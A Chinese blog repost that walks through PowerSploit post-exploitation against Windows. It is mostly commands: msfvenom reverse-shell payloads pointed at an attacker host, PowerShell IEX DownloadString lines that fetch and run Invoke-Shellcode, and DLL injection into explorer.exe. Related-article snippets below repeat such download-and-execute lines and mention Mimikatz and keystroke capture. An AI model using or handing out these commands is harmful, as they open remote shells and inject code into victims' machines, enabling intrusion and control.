【后渗透】PowerSploit

最新推荐文章于 2023-03-13 14:12:22 发布
最新推荐文章于 2023-03-13 14:12:22 发布
阅读量291 收藏 3
点赞数
文章标签: git 网络
原文链接:http://www.cnblogs.com/peterpan0707007/p/9381783.html
版权

1、下载安装:git clone https://github.com/mattifestation/PowerSploit.git

2、搭建web服务器(如172.16.12.2),将powersploit置于web根目录下

3、msfvenom生成反弹木马(目标是windows系统)

http反弹:msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.12.2 lport=4444 -f powershell -o /var/www/html/test

tcp反弹:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.12.2 lport=4444 -f dll -o /var/www/html/test.dll

4、msf下开启监听

5、第一种目标powershell环境中执行Invoke-Shellcode,脚本:

IEX(New-Object Net.Webclient).DownloadString("http://172.16.12.2/PowerSploit/CodeExecution/Invoke-Shellcode.ps1")
IEX(New-Object Net.Webclient).DownloadString("http://172.16.12.2/code")
Invoke-Shellcode -Shellcode $buf -Force

第二种执行Invoke-DllIjection,脚本:

IEX(New-Object Net.Webclient).DownloadString("http://172.16.12.2/PowerSploit/CodeExecution/Invoke-DllInjection.ps1")
IEX(New-Object Net.Webclient).DownloadString("http://192.168.233.128/code.dll")
ps -Name explorer
Invoke-DllInjection -Dll .\code.dll -ProcessID 3588

注释:第三条命令是查找explorer进程的进程号,之后将dll文件注入到此进程中

 

转载于:https://www.cnblogs.com/peterpan0707007/p/9381783.html

weixin_30879833
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试-后渗透阶段.pdf
02-25
《Metasploit渗透测试魔鬼训练营》读书笔记文档,是在我看书的过程中对书中理论和一些实践的总结。
powersploit介绍以及攻击实战
weixin_43152809的博客
01-02 1838
powersploit是一款基于powershell的后渗透框架软件,包含很多powershell攻击脚本,主要用于信息侦察、权限提升、权限维持 下载地址 powersploit安装 git命令下载 git clone https://github.com/PowerShellMafia/PowerSploit/ 随后打开apache服务器,将下载的文件上传到www目录下 按照上图介绍powersploit各模块的功能 AntivirusBypass 发现杀毒软件的查杀特征 CodeExecutio
PowerSploit渗透教程
weixin_43749601的博客
03-21 1842
简介 PowerSploit是一款基于PowerShell的后渗透框架软件,包含很多Powershell攻击脚本,它们主要是用于渗透中的信息侦查、权限提升、权限维持。 https://github.com/mattifestation/PowerSploit Linux下安装和搭建Powersploit 开启Apache服务 将下载好的文件放在/var/www/html目录,搭建一个简易的服务器 在网页中打开http://localhost/PowerSploit-master/ Powersploi
第一章 内网渗透测试基础
江南小虫虫的博客
02-13 8230
0x00 内网基础知识 内网也指局域网(Local Area Network, LAN), 是指在某一区域内由多台计算机互连而成的计算机组 在局域网中, 可以实现文件管理, 应用软件共享, 打印机共享, 工作组内的日程安排, 电子邮件和传真通信服务器等 工作组 将不同的计算机按功能(或部门)分别列入不同的工作组(Work Group) 加入/创建工作组的方法: 右键桌面计算机->属性-&g...
PowerSploit攻击
weixin_45007073的博客
05-07 404
PowerSploit简介各模块功能Invoke-Shellcode 简介 PowerSploit是一款后渗透框架,主要用于信息侦察、权限提升、权限维持。它在github上可以下载 各模块功能 模块 功能 AntivirusBypass 发现杀毒软件的查杀特征 CodeExecution 在目标主机上执行代码 Exfiltration 目标主机上的信息搜集工具 Mayhem 蓝屏等破坏性脚本 Persistence 后门脚本 Recon 以目标主机为跳板进行内网信息侦察
PowerSploit脚本攻击实战
bring_coco的博客
01-24 939
环境 kali(192.168.188.128) win7(192.168.188.148) 前提 1.输入git命令安装PowerSploit 命令:git clone https://github.com/PowerShellMafia/PowerSploit 演示: 2.输入以下命令开启Apache服务 命令:service apache2 start 演示: 3.把下载好的文件夹移动到var/www/html目录,搭建一个简易的服务器 介绍PowerSploit各模块的功能 1.Antivi
meterpreter后渗透模块最新实操视频
11-02
这个教程主要侧重于内网渗透metasploit中的meterete视频实操,小编自认为不错,因为免费分享给更多人学习,想学习更多内容下载后按照向导关注我们的自媒体平台即可,谢谢支持!
POWERSHELL_内网渗透实例.pdf
08-07
目录 1.POWERSHELL简介 2.POWERSPLOIT 3.内网渗透实例
渗透,持续渗透,后渗透的本质
03-24
渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。持续渗透的本质是线索关联,而线索关联为后续的攻击链方...后渗透的本质是权限把控,而权限把控为后渗透提供了以牺牲时间换取空间强大基础。
渗透软件cs4中文版.zip
12-03
渗透软件cs4中文版
PowerSploitPowerSploit-PowerShell开发后框架
02-18
该项目不再受支持 PowerSploit是Microsoft PowerShell模块的集合,可用于在评估的所有阶段帮助渗透测试人员。 PowerSploit由以下模块和脚本组成: 代码执行 在目标计算机上执行代码。 Invoke-DllInjection 将Dll注入到您选择的进程ID中。 Invoke-ReflectivePEInjection 将Windows PE文件(DLL / EXE)反射性地加载到powershell进程中,或反射性地将DLL注入到远程进程中。 Invoke-Shellcode 将shellcode注入您选择的进程ID或在本地PowerShell中。 Invoke-WmiCommand 在目标计算机上执行PowerShell脚本块,并使用WMI作为C2通道返回其格式化输出。 脚本修改 修改和/或准备脚本以在受感染的计算机上执行。 Out-Encoded
Meteasploit技术
m0_65332604的博客
04-06 2273
在使用Kali操作系统是应注意即使更新源,就像平时及时更新手机APP更新命令如下: apt-get update:只更新软件包的索引源,作用:同步源的软件包的索引信息,从而进行软件更新。 Apt-get upgrade:升级系统上安装的所有软件包,如果失败则保持更新之前的状态。 Apt-get dist-upgrade:升级整个Liunux系统(不仅升级所有已安装的软件包,而且会处理升级过程中可能出现的冲突,在某些情况下,他的部分升级需要人工参与)。 渗透攻击大致步骤: *扫描目标及系统,寻找可用
DownloadString”时发生异常:“基础连接已经关闭: 发送时发生错误
热门推荐
weixin_41816287的博客
06-23 2万+
win10下安装scoop遇到错误:“DownloadString”时发生异常:“基础连接已经关闭: 发送时发生错误”,记录一下解决过程。   确认powershell版本是3以上,更改powershell执行策略 PS C:\Users\STAR> $PSVersionTable Name Value ---- ...
Powershell攻击指南1——PowerSploit
willow_liang的博客
12-05 1424
1.1PowerShell技术 灵活且能功能化管理Windows系统,一旦攻击者可以在计算机上执行代码,就可下载powershell脚本(.ps1)到磁盘中执行,甚至可以直接在内存中执行。 常用的powershell攻击工具: PowerSploit: 这是众多owehShe攻击工具中被广泛使用的PoweShel后期漏洞利用框架,常用于信息探测、特权提升、凭证窃取、持久化等操作。 Nishang:基于PowerShell的渗透测试专用工具,集成了框架、脚本和各种Payload,包含下载和执行、键盘记
kali安装PowerSploit
qq_53175607的博客
11-19 2863
PowerSploit的安装 1.使用命令git clone https://github.com/PowerShellMafia/PowerSploitgithub下载文件。 2.使用命令service apache2 start启动apache服务。 3.将下载好的文件移动到var/www/html下 注意:自己下载的文件路径可能不一样,要按照自己的来。 4.重启apacheservice apache2 start,自己kali的ip/PowerSploit/进入目标页面比如 192.168.5.1
PowerSploit 使用方法
weixin_44844556的博客
03-13 263
powersploit
WebClient类的DownloadString方法的缺陷
weixin_30408675的博客
02-09 719
问题发现: 用以下代码获取的网页源代码,大部分中文显示正常,一部分成为?? Codeusing System;using System.Collections.Generic;using System.Net;using System.Text;namespace Test_GetUTF8Website{ class Program { staticvoid Mai...
scoop安装mysql_windows下安装scoop
weixin_42323034的博客
02-11 552
scoop是windows下的包管理工具,类似与linux下的yum和python的pip。 scoop可以在windows下方便的进行软件的管理,尤其是对开发者提供了很大的遍历。cmd下执行如下红色命令:C:\Users\acer>powershell #进入到powershellWindows PowerShell版权所有 (C) Microsoft Corporation。保留所有...
Invoke-Portscan、Invoke-Mimikatz、Get-Keystrokes
weixin_46104215的博客
11-08 459
一、Invoke-Portscan Recon 模块的一个脚本,主要用于端口扫描 1.下载脚本 IEX(New-Object Net.WebClient).DownloadString("http://192.168.110.130/PowerSploit/Recon/Invoke-Portscan.ps1") 2.扫描 Invoke-Portscan -Hosts 192.168.110.130, 192.168.110.142 -Ports "80,22,4444" 二、Invo
powersploit
最新发布
07-29
PowerSploit是一款基于PowerShell的后渗透框架软件,它包含了许多用于渗透测试的攻击脚本。这些脚本主要用于信息侦查、权限提升和权限维持等方面的操作。\[1\]其中,Invoke-Mimikatz是PowerSploit中的一个脚本,属于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值